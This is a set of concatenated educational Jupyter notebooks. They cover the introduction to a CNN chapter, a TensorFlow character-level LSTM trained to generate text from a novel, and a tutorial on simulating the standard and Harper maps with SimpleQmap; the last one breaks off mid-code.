# all academic competitions and commercial applications involving image
# recognition, object detection, or semantic segmentation are built on this
# approach.
#
# The design of modern CNNs owes much to biology, group theory, and a series
# of supplementary experiments. CNNs require fewer parameters than fully
# connected architectures, and convolutions are easy to parallelize on GPUs.
# As a result, CNNs are not only sample-efficient, yielding accurate models,
# but also computationally efficient. Over time, practitioners have come to
# use CNNs more and more, even for one-dimensional sequence tasks such as
# audio, text, and time-series analysis, where recurrent neural networks are
# conventionally used. Clever adaptations of CNNs have also brought them to
# bear on graph-structured data and recommender systems.
#
# We begin this chapter with the basic elements that form the backbone of all
# convolutional networks: the convolutional layers themselves, the
# nitty-gritty details of padding and stride, the pooling layers used to
# aggregate information across adjacent regions, the use of multiple
# channels at each layer, and a careful discussion of modern architectures.
# We conclude the chapter with a complete, working LeNet model: the first
# successfully deployed convolutional network, predating the rise of modern
# deep learning. In the next chapter, we will dive into full implementations
# of some popular and comparatively recent CNN architectures whose designs
# represent most of the techniques commonly used by modern practitioners.
#
# :begin_tab:toc
# - [why-conv](why-conv.ipynb)
# - [conv-layer](conv-layer.ipynb)
# - [padding-and-strides](padding-and-strides.ipynb)
# - [channels](channels.ipynb)
# - [pooling](pooling.ipynb)
# - [lenet](lenet.ipynb)
# :end_tab:
#
|
submodules/resource/d2l-zh/tensorflow/chapter_convolutional-neural-networks/index.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # <NAME>
#
# In this notebook, I'll build a character-wise RNN trained on <NAME>, one of my all-time favorite books. It'll be able to generate new text based on the text from the book.
#
# This network is based off of <NAME>'s [post on RNNs](http://karpathy.github.io/2015/05/21/rnn-effectiveness/) and [implementation in Torch](https://github.com/karpathy/char-rnn). Also, some information [here at r2rt](http://r2rt.com/recurrent-neural-networks-in-tensorflow-ii.html) and from [<NAME>](https://github.com/sherjilozair/char-rnn-tensorflow) on GitHub. Below is the general architecture of the character-wise RNN.
#
# <img src="assets/charseq.jpeg" width="500">
# +
import time
from collections import namedtuple
import numpy as np
import tensorflow as tf
# -
# First we'll load the text file and convert it into integers for our network to use. Here I'm creating a couple dictionaries to convert the characters to and from integers. Encoding the characters as integers makes it easier to use as input in the network.
with open('anna.txt', 'r') as f:
text=f.read()
vocab = sorted(set(text))
vocab_to_int = {c: i for i, c in enumerate(vocab)}
int_to_vocab = dict(enumerate(vocab))
encoded = np.array([vocab_to_int[c] for c in text], dtype=np.int32)
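# A quick round trip through the two dictionaries confirms the encoding is
# lossless (shown self-contained here with a toy string rather than
# `anna.txt`):

```python
# Round-trip check on a toy string (stand-in for the full text of anna.txt).
sample = "happy families are all alike"
toy_vocab = sorted(set(sample))
toy_v2i = {c: i for i, c in enumerate(toy_vocab)}
toy_i2v = dict(enumerate(toy_vocab))

toy_encoded = [toy_v2i[c] for c in sample]
decoded = "".join(toy_i2v[i] for i in toy_encoded)
print(decoded == sample)  # True: the mapping is lossless
```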
# Let's check out the first 100 characters, make sure everything is peachy. According to the [American Book Review](http://americanbookreview.org/100bestlines.asp), this is the 6th best first line of a book ever.
text[:100]
# And we can see the characters encoded as integers.
encoded[:100]
# Since the network is working with individual characters, it's similar to a classification problem in which we are trying to predict the next character from the previous text. Here's how many 'classes' our network has to pick from.
len(vocab)
# ## Making training mini-batches
#
# Here is where we'll make our mini-batches for training. Remember that we want our batches to be multiple sequences of some desired number of sequence steps. Considering a simple example, our batches would look like this:
#
# <img src="assets/sequence_batching@1x.png" width=500px>
#
#
# <br>
#
# We start with our text encoded as integers in one long array in `encoded`. Let's create a function that will give us an iterator for our batches. I like using [generator functions](https://jeffknupp.com/blog/2013/04/07/improve-your-python-yield-and-generators-explained/) to do this. Then we can pass `encoded` into this function and get our batch generator.
#
# The first thing we need to do is discard some of the text so we only have completely full batches. Each batch contains $N \times M$ characters, where $N$ is the batch size (the number of sequences) and $M$ is the number of steps. Then, to get the total number of batches, $K$, we can make from the array `arr`, you divide the length of `arr` by the number of characters per batch. Once you know the number of batches, you can get the total number of characters to keep from `arr`, $N * M * K$.
#
# After that, we need to split `arr` into $N$ sequences. You can do this using `arr.reshape(size)` where `size` is a tuple containing the dimension sizes of the reshaped array. We know we want $N$ sequences (`batch_size` below), so let's make that the size of the first dimension. For the second dimension, you can use `-1` as a placeholder in the size; it'll fill up the array with the appropriate data for you. After this, you should have an array that is $N \times (M * K)$.
#
# Now that we have this array, we can iterate through it to get our batches. The idea is each batch is a $N \times M$ window on the $N \times (M * K)$ array. For each subsequent batch, the window moves over by `n_steps`. We also want to create both the input and target arrays. Remember that the targets are the inputs shifted over one character.
#
# The way I like to create this window is to use `range` to take steps of size `n_steps` from $0$ to `arr.shape[1]`, the total number of steps in each sequence. That way, the integers you get from `range` always point to the start of a batch, and each window is `n_steps` wide.
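# The trimming, reshaping, and windowing steps described above can be sketched on a toy array (the numbers here are purely illustrative):

```python
import numpy as np

# Toy "encoded text": 14 characters, batch size N=2, sequence steps M=3
arr = np.arange(14)
batch_size, n_steps = 2, 3

chars_per_batch = batch_size * n_steps        # N * M = 6
n_batches = len(arr) // chars_per_batch       # K = 2 full batches
arr = arr[:n_batches * chars_per_batch]       # drop the 2 leftover characters
arr = arr.reshape((batch_size, -1))           # shape (2, 6) = N x (M * K)

# Each batch is an N x M window that slides right by n_steps
windows = [arr[:, n:n + n_steps] for n in range(0, arr.shape[1], n_steps)]
print(arr)
print(windows[0])
```

Here the first window pairs the row starts `0` and `6`, and the second window picks up exactly where the first left off.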
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
# Get the number of characters per batch and number of batches we can make
chars_per_batch = batch_size * n_steps
n_batches = len(arr)//chars_per_batch
# Keep only enough characters to make full batches
arr = arr[:n_batches * chars_per_batch]
# Reshape into batch_size rows
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
# The features
x = arr[:, n:n+n_steps]
# The targets, shifted by one
y_temp = arr[:, n+1:n+n_steps+1]
# For the very last batch, y will be one character short at the end of
# the sequences which breaks things. To get around this, I'll make an
# array of the appropriate size first, of all zeros, then add the targets.
# This will introduce a small artifact in the last batch, but it won't matter.
y = np.zeros(x.shape, dtype=x.dtype)
y[:,:y_temp.shape[1]] = y_temp
yield x, y
# Now I'll make my data sets and we can check out what's going on here. Here I'm going to use a batch size of 10 and 50 sequence steps.
batches = get_batches(encoded, 10, 50)
x, y = next(batches)
print('x\n', x[:10, :10])
print('\ny\n', y[:10, :10])
# If you implemented `get_batches` correctly, the above output should look something like
# ```
# x
# [[55 63 69 22 6 76 45 5 16 35]
# [ 5 69 1 5 12 52 6 5 56 52]
# [48 29 12 61 35 35 8 64 76 78]
# [12 5 24 39 45 29 12 56 5 63]
# [ 5 29 6 5 29 78 28 5 78 29]
# [ 5 13 6 5 36 69 78 35 52 12]
# [63 76 12 5 18 52 1 76 5 58]
# [34 5 73 39 6 5 12 52 36 5]
# [ 6 5 29 78 12 79 6 61 5 59]
# [ 5 78 69 29 24 5 6 52 5 63]]
#
# y
# [[63 69 22 6 76 45 5 16 35 35]
# [69 1 5 12 52 6 5 56 52 29]
# [29 12 61 35 35 8 64 76 78 28]
# [ 5 24 39 45 29 12 56 5 63 29]
# [29 6 5 29 78 28 5 78 29 45]
# [13 6 5 36 69 78 35 52 12 43]
# [76 12 5 18 52 1 76 5 58 52]
# [ 5 73 39 6 5 12 52 36 5 78]
# [ 5 29 78 12 79 6 61 5 59 63]
# [78 69 29 24 5 6 52 5 63 76]]
# ```
# although the exact numbers will be different. Check to make sure the data is shifted over one step for `y`.
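# Beyond eyeballing the integers, the shift can be checked programmatically. Here's a small helper (not part of the original notebook) that compares all but the last column:

```python
import numpy as np

def check_shift(x, y):
    """True when y matches x shifted left by one character.
    The last column of y is ignored, since for the final batch it
    is zero-filled rather than taken from the text."""
    return bool((y[:, :-1] == x[:, 1:]).all())

# Tiny fabricated batch for illustration
x = np.array([[5, 6, 7], [1, 2, 3]])
y = np.array([[6, 7, 0], [2, 3, 0]])
print(check_shift(x, y))  # True
```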
# ## Building the model
#
# Below is where you'll build the network. We'll break it up into parts so it's easier to reason about each bit. Then we can connect them up into the whole network.
#
# <img src="assets/charRNN.png" width=500px>
#
#
# ### Inputs
#
# First off we'll create our input placeholders. As usual we need placeholders for the training data and the targets. We'll also create a placeholder for dropout layers called `keep_prob`.
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, [batch_size, num_steps], name='inputs')
targets = tf.placeholder(tf.int32, [batch_size, num_steps], name='targets')
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
return inputs, targets, keep_prob
# ### LSTM Cell
#
# Here we will create the LSTM cell we'll use in the hidden layer. We'll use this cell as a building block for the RNN. So we aren't actually defining the RNN here, just the type of cell we'll use in the hidden layer.
#
# We first create a basic LSTM cell with
#
# ```python
# lstm = tf.contrib.rnn.BasicLSTMCell(num_units)
# ```
#
# where `num_units` is the number of units in the hidden layers in the cell. Then we can add dropout by wrapping it with
#
# ```python
# tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
# ```
# You pass in a cell and it will automatically add dropout to the inputs or outputs. Finally, we can stack up the LSTM cells into layers with [`tf.contrib.rnn.MultiRNNCell`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/rnn/MultiRNNCell). With this, you pass in a list of cells and it will send the output of one cell into the next cell. Previously with TensorFlow 1.0, you could do this
#
# ```python
# tf.contrib.rnn.MultiRNNCell([cell]*num_layers)
# ```
#
# This might look a little weird if you know Python well because this will create a list of the same `cell` object. However, TensorFlow 1.0 will create different weight matrices for all `cell` objects. But, starting with TensorFlow 1.1 you actually need to create new cell objects in the list. To get it to work in TensorFlow 1.1, it should look like
#
# ```python
# def build_cell(num_units, keep_prob):
# lstm = tf.contrib.rnn.BasicLSTMCell(num_units)
# drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
#
# return drop
#
# tf.contrib.rnn.MultiRNNCell([build_cell(num_units, keep_prob) for _ in range(num_layers)])
# ```
#
# Even though this is actually multiple LSTM cells stacked on each other, you can treat the multiple layers as one cell.
#
# We also need to create an initial cell state of all zeros. This can be done like so
#
# ```python
# initial_state = cell.zero_state(batch_size, tf.float32)
# ```
#
# Below, we implement the `build_lstm` function to create these LSTM cells and the initial state.
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
'''
### Build the LSTM Cell
def build_cell(lstm_size, keep_prob):
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# Stack up multiple LSTM layers, for deep learning
cell = tf.contrib.rnn.MultiRNNCell([build_cell(lstm_size, keep_prob) for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
# ### RNN Output
#
# Here we'll create the output layer. We need to connect the output of the RNN cells to a fully connected layer with a softmax output. The softmax output gives us a probability distribution we can use to predict the next character.
#
# If our input has batch size $N$, number of steps $M$, and the hidden layer has $L$ hidden units, then the output is a 3D tensor with size $N \times M \times L$. The output of each LSTM cell has size $L$, we have $M$ of them, one for each sequence step, and we have $N$ sequences. So the total size is $N \times M \times L$.
#
# We are using the same fully connected layer, the same weights, for each of the outputs. Then, to make things easier, we should reshape the outputs into a 2D tensor with shape $(M * N) \times L$. That is, one row for each sequence and step, where the values of each row are the output from the LSTM cells.
#
# Once we have the outputs reshaped, we can do the matrix multiplication with the weights. We need to wrap the weight and bias variables in a variable scope with `tf.variable_scope(scope_name)` because there are weights being created in the LSTM cells. TensorFlow will throw an error if the weights created here have the same names as the weights created in the LSTM cells, which they will by default. To avoid this, we wrap the variables in a variable scope so we can give them unique names.
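# The reshape from $N \times M \times L$ down to one row per (sequence, step) pair can be sketched with plain numpy (the sizes here are arbitrary):

```python
import numpy as np

N, M, L = 4, 5, 8                 # batch size, steps, LSTM units (arbitrary)
lstm_output = np.random.randn(N, M, L)

# One row for each sequence and step, lstm_size columns
flat = lstm_output.reshape(-1, L)
print(flat.shape)                 # (20, 8)

# Row ordering: all M steps of sequence 0 come first, then sequence 1, ...
assert (flat[0] == lstm_output[0, 0]).all()
assert (flat[M] == lstm_output[1, 0]).all()
```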
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
        lstm_output: Input tensor from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# That is, the shape should be batch_size*num_steps rows by lstm_size columns
seq_output = tf.concat(lstm_output, axis=1)
x = tf.reshape(seq_output, [-1, in_size])
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name='predictions')
return out, logits
# ### Training loss
#
# Next up is the training loss. We get the logits and targets and calculate the softmax cross-entropy loss. First we need to one-hot encode the targets, since we're getting them as encoded characters. Then, reshape the one-hot targets so it's a 2D tensor with size $(M*N) \times C$ where $C$ is the number of classes/characters we have. Remember that we reshaped the LSTM outputs and ran them through a fully connected layer with $C$ units. So our logits will also have size $(M*N) \times C$.
#
# Then we run the logits and targets through `tf.nn.softmax_cross_entropy_with_logits` and find the mean to get the loss.
def build_loss(logits, targets, lstm_size, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
lstm_size: Number of LSTM hidden units
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per batch_size per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
# ### Optimizer
#
# Here we build the optimizer. Normal RNNs have issues with exploding and vanishing gradients. LSTMs fix the vanishing problem, but the gradients can still grow without bound. To fix this, we can clip the gradients above some threshold. That is, if a gradient is larger than that threshold, we set it to the threshold. This will ensure the gradients never grow overly large. Then we use an AdamOptimizer for the learning step.
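# The behavior of `tf.clip_by_global_norm` — rescaling *all* gradients together whenever their joint norm exceeds the threshold — can be mimicked in numpy. This is a sketch of the semantics, not the TensorFlow implementation:

```python
import numpy as np

def clip_by_global_norm(grads, clip_norm):
    """Scale the list of gradients so their joint L2 norm is at
    most clip_norm, mirroring tf.clip_by_global_norm's semantics."""
    global_norm = np.sqrt(sum(np.sum(g ** 2) for g in grads))
    if global_norm > clip_norm:
        grads = [g * (clip_norm / global_norm) for g in grads]
    return grads, global_norm

grads = [np.array([3.0, 4.0]), np.array([12.0])]   # joint norm = 13
clipped, norm = clip_by_global_norm(grads, 5.0)
print(norm)   # 13.0 before clipping; afterwards the joint norm is 5
```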
def build_optimizer(loss, learning_rate, grad_clip):
    ''' Build optimizer for training, using gradient clipping.
        Arguments:
        loss: Network loss
        learning_rate: Learning rate for optimizer
        grad_clip: Threshold for clipping the global gradient norm
    '''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
# ### Build the network
#
# Now we can put all the pieces together and build a class for the network. To actually run data through the LSTM cells, we will use [`tf.nn.dynamic_rnn`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/nn/dynamic_rnn). This function will pass the hidden and cell states across LSTM cells appropriately for us. It returns the outputs for each LSTM cell at each step for each sequence in the mini-batch. It also gives us the final LSTM state. We want to save this state as `final_state` so we can pass it to the first LSTM cell in the next mini-batch run. For `tf.nn.dynamic_rnn`, we pass in the cell and initial state we get from `build_lstm`, as well as our input sequences. Also, we need to one-hot encode the inputs before going into the RNN.
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling == True:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN and collect the outputs
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
self.loss = build_loss(self.logits, self.targets, lstm_size, num_classes)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
# ## Hyperparameters
#
# Here I'm defining the hyperparameters for the network.
#
# * `batch_size` - Number of sequences running through the network in one pass.
# * `num_steps` - Number of characters in the sequence the network is trained on. Typically larger is better; the network can learn more long-range dependencies, but it takes longer to train. 100 is usually a good number here.
# * `lstm_size` - The number of units in the hidden layers.
# * `num_layers` - Number of hidden LSTM layers to use
# * `learning_rate` - Learning rate for training
# * `keep_prob` - The dropout keep probability when training. If your network is overfitting, try decreasing this.
#
# Here's some good advice from <NAME> on training the network. I'm going to copy it in here for your benefit, but also link to [where it originally came from](https://github.com/karpathy/char-rnn#tips-and-tricks).
#
# > ## Tips and Tricks
#
# >### Monitoring Validation Loss vs. Training Loss
# >If you're somewhat new to Machine Learning or Neural Networks it can take a bit of expertise to get good models. The most important quantity to keep track of is the difference between your training loss (printed during training) and the validation loss (printed once in a while when the RNN is run on the validation data (by default every 1000 iterations)). In particular:
#
# > - If your training loss is much lower than validation loss then this means the network might be **overfitting**. Solutions to this are to decrease your network size, or to increase dropout. For example you could try dropout of 0.5 and so on.
# > - If your training/validation loss are about equal then your model is **underfitting**. Increase the size of your model (either number of layers or the raw number of neurons per layer)
#
# > ### Approximate number of parameters
#
# > The two most important parameters that control the model are `lstm_size` and `num_layers`. I would advise that you always use `num_layers` of either 2/3. The `lstm_size` can be adjusted based on how much data you have. The two important quantities to keep track of here are:
#
# > - The number of parameters in your model. This is printed when you start training.
# > - The size of your dataset. 1MB file is approximately 1 million characters.
#
# >These two should be about the same order of magnitude. It's a little tricky to tell. Here are some examples:
#
# > - I have a 100MB dataset and I'm using the default parameter settings (which currently print 150K parameters). My data size is significantly larger (100 mil >> 0.15 mil), so I expect to heavily underfit. I am thinking I can comfortably afford to make `lstm_size` larger.
# > - I have a 10MB dataset and running a 10 million parameter model. I'm slightly nervous and I'm carefully monitoring my validation loss. If it's larger than my training loss then I may want to try to increase dropout a bit and see if that helps the validation loss.
#
# > ### Best models strategy
#
# >The winning strategy to obtaining very good models (if you have the compute time) is to always err on making the network larger (as large as you're willing to wait for it to compute) and then try different dropout values (between 0,1). Whatever model has the best validation performance (the loss, written in the checkpoint filename, low is good) is the one you should use in the end.
#
# >It is very common in deep learning to run many different models with many different hyperparameter settings, and in the end take whatever checkpoint gave the best validation performance.
#
# >By the way, the size of your training and validation splits are also parameters. Make sure you have a decent amount of data in your validation set or otherwise the validation performance will be noisy and not very informative.
#
batch_size = 100 # Sequences per batch
num_steps = 100 # Number of sequence steps per batch
lstm_size = 512 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.001 # Learning rate
keep_prob = 0.5 # Dropout keep probability
# ## Time for training
#
# This is typical training code, passing inputs and targets into the network, then running the optimizer. Here we also get back the final LSTM state for the mini-batch. Then, we pass that state back into the network so the next batch can continue the state from the previous batch. And every so often (set by `save_every_n`) I save a checkpoint.
#
# Here I'm saving checkpoints with the format
#
# `i{iteration number}_l{# hidden layer units}.ckpt`
# +
epochs = 20
# Print losses every N iterations
print_every_n = 50
# Save every N iterations
save_every_n = 200
model = CharRNN(len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
#saver.restore(sess, 'checkpoints/______.ckpt')
counter = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
loss = 0
for x, y in get_batches(encoded, batch_size, num_steps):
counter += 1
start = time.time()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
if (counter % print_every_n == 0):
end = time.time()
print('Epoch: {}/{}... '.format(e+1, epochs),
'Training Step: {}... '.format(counter),
'Training loss: {:.4f}... '.format(batch_loss),
'{:.4f} sec/batch'.format((end-start)))
if (counter % save_every_n == 0):
saver.save(sess, "checkpoints/i{}_l{}.ckpt".format(counter, lstm_size))
saver.save(sess, "checkpoints/i{}_l{}.ckpt".format(counter, lstm_size))
# -
# #### Saved checkpoints
#
# Read up on saving and loading checkpoints here: https://www.tensorflow.org/programmers_guide/variables
tf.train.get_checkpoint_state('checkpoints')
# ## Sampling
#
# Now that the network is trained, we can use it to generate new text. The idea is that we pass in a character, then the network will predict the next character. We can use the new one to predict the next one, and we keep doing this to generate all new text. I also included some functionality to prime the network with some text by passing in a string and building up a state from that.
#
# The network gives us predictions for each character. To reduce noise and make things a little less random, I'm going to only choose a new character from the top N most likely characters.
#
#
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
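# A quick sanity check on `pick_top_n`: with `top_n=3`, repeated draws should only ever return one of the three most probable indices. (The function is restated here so the snippet runs standalone; note it modifies `preds` in place, hence the `.copy()`.)

```python
import numpy as np

def pick_top_n(preds, vocab_size, top_n=5):
    p = np.squeeze(preds)
    p[np.argsort(p)[:-top_n]] = 0   # zero all but the top_n probabilities
    p = p / np.sum(p)               # renormalise
    return np.random.choice(vocab_size, 1, p=p)[0]

preds = np.array([0.01, 0.02, 0.5, 0.3, 0.1, 0.04, 0.03])
picks = {pick_top_n(preds.copy(), len(preds), top_n=3) for _ in range(200)}
print(sorted(picks))   # only indices from {2, 3, 4} ever appear
```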
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The "):
samples = [c for c in prime]
model = CharRNN(len(vocab), lstm_size=lstm_size, sampling=True)
saver = tf.train.Saver()
with tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(vocab))
samples.append(int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(vocab))
samples.append(int_to_vocab[c])
return ''.join(samples)
# Here, pass in the path to a checkpoint and sample from the network.
tf.train.latest_checkpoint('checkpoints')
checkpoint = tf.train.latest_checkpoint('checkpoints')
samp = sample(checkpoint, 2000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i200_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i600_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i1200_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
intro-to-rnns/Anna_KaRNNa_Solution.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + active=""
# The ipython notebook for this page can be downloaded :download:`here <std.ipynb>`
# -
# # Classical map systems
#
#
# Consider the following time-dependent Hamiltonian:
#
# $$
# H(q,p,t) = T(p) + V(q)\sum_{n=-\infty}^{\infty}\delta(t-n) \tag{1}
# $$
#
# The second term represents a perturbation by the potential that is applied only at the discrete times $t=n$ $(n=\cdots,-1,0,1,\cdots)$.
# Hamilton's equations of motion (Newton's equations) for (1) reduce to the map
#
# $$
# \begin{split}
# p_{n+1} &= p_{n} - V'(q_{n})\\
# q_{n+1} &= q_{n} + T'(p_{n+1})
# \end{split}
# $$
#
# where $V'(q)$ and $T'(p)$ denote $\frac{dV}{dq}$ and $\frac{dT}{dp}$, respectively.
# The subscript $n$ labels the $n$-th kick. Note that the subscript in the second line of the map is $p_{n+1}$, not $p_{n}$.
#
# ### Standard map
#
# Taking $T(p)=p^2/2$ and $V(q) = k\cos(2\pi q)/(2\pi)^2$, the map becomes
#
# $$
# \begin{split}
# p' & = p + \frac{k}{2\pi} \sin(2\pi q)\\
# q' & = q + p'
# \end{split}
# $$
#
# which is known as the [standard map](http://www.scholarpedia.org/article/Chirikov_standard_map).
# ### Example 1
#
# To start, let's compute orbits generated by the standard map without using SimpleQmap.
# Note that this page was created with an ipython notebook; if you are not running the code in a notebook, skip the `%matplotlib inline` line below.
# skip the following command if you are not using ipython notebook
# %matplotlib inline
# +
import numpy as np
import matplotlib.pyplot as plt
twopi = 2.0*np.pi
# definition of the map
def Map(q,p,k):
pp = p + k*np.sin(q*twopi)/twopi
qq = q + pp
return [qq,pp]
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k=1
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,k)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
# ### Example 2
#
# Only the standard map is predefined in SimpleQmap; its source code is in SimpleQmap/maps.py.
# As the source shows, it is somewhat cluttered, but with the comments stripped it is essentially the following:
# +
import numpy
twopi=2.0*numpy.pi
class Symplectic(object):
pass
class StandardMap(Symplectic):
def __init__(self, k):
self.k = k
def func0(self, x):
return -self.k*numpy.sin(twopi*x)/twopi
def func1(self, x):
return x
def ifunc0(self, x):
return self.k*numpy.cos(twopi*x)/(twopi*twopi)
def ifunc1(self, x):
return 0.5*x*x
# -
# For Python classes, see the official documentation (http://docs.python.jp/3.5/tutorial/classes.html)
#
# The Symplectic class defined above is essentially an empty placeholder, so you can ignore it.
# The StandardMap class defines the methods func0, func1, ifunc0, and ifunc1.
# In terms of the Hamiltonian (1), they correspond to
#
# func0: $\frac{dV(q)}{dq}$
#
# func1: $\frac{dT(p)}{dp}$
#
# ifunc0: $V(q)$
#
# ifunc1: $T(p)$
#
# You are not obliged to use this class, but rewriting the program above with SimpleQmap gives the following.
# +
import numpy as np
import matplotlib.pyplot as plt
import SimpleQmap as sq
twopi = 2.0*np.pi
def Map(q,p, cmap):
pp = p - cmap.func0(q)
qq = q + cmap.func1(pp)
return [qq,pp]
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k=1
cmap = sq.StandardMap(k)
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,cmap)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
# ### Inheritance example
#
# SimpleQmap only defines the standard map, but in practice you may want to define other maps.
# As an example, here we subclass StandardMap to define a HarperMap.
#
# The Harper map is defined by
#
# $$
# \begin{split}
# p_{n+1} &= p_{n} + k\sin(2\pi q_n)/(2\pi)\\
# q_{n+1} &= q_{n} + a\sin(2\pi p_{n+1})/(2\pi)
# \end{split}
# $$
#
# Since the definition of $V(q)$ is shared with the standard map, we only need to override (rewrite) the definition of $T(p)$.
# For example, the program can be written as follows.
# +
import numpy as np
import matplotlib.pyplot as plt
import SimpleQmap as sq
twopi = 2.0*np.pi
class HarperMap(sq.StandardMap):
def __init__(self, k,a):
sq.StandardMap.__init__(self,k)
self.a = a
    def func1(self, x):
        return self.a*np.sin(twopi*x)/twopi
    def ifunc1(self, x):
        return -self.a*np.cos(twopi*x)/twopi/twopi
def Map(q,p, cmap):
pp = p - cmap.func0(q)
qq = q + cmap.func1(pp)
return [qq,pp]
fig = plt.figure(figsize=(6,6))
